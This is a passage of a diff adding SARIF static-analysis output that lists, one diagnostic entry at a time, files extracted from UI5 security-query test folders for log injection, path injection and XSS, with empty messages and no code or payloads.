"artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 186 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 187 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 189 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 190 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 191 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 192 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 193 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 194 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 195 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 196 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 198 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 199 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/utils/CustomLogListener.js", + "uriBaseId" : "%SRCROOT%", + "index" : 200 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 201 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 202 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 203 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 204 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 205 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 207 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 208 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 209 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 210 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 211 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 212 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 213 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 214 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 215 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 216 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 217 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 218 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 219 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 220 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 221 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 223 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 224 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 225 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 226 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 227 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 228 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 229 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 230 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 231 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 232 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 233 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 234 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 235 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 236 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 237 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", + "uriBaseId" : "%SRCROOT%", + "index" : 238 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 239 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 240 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/Component.js", + "uriBaseId" : "%SRCROOT%", + "index" : 241 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 242 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", + "uriBaseId" : "%SRCROOT%", + "index" : 243 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 244 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 245 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/model/todoitems.json", + "uriBaseId" : "%SRCROOT%", + "index" : 246 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { 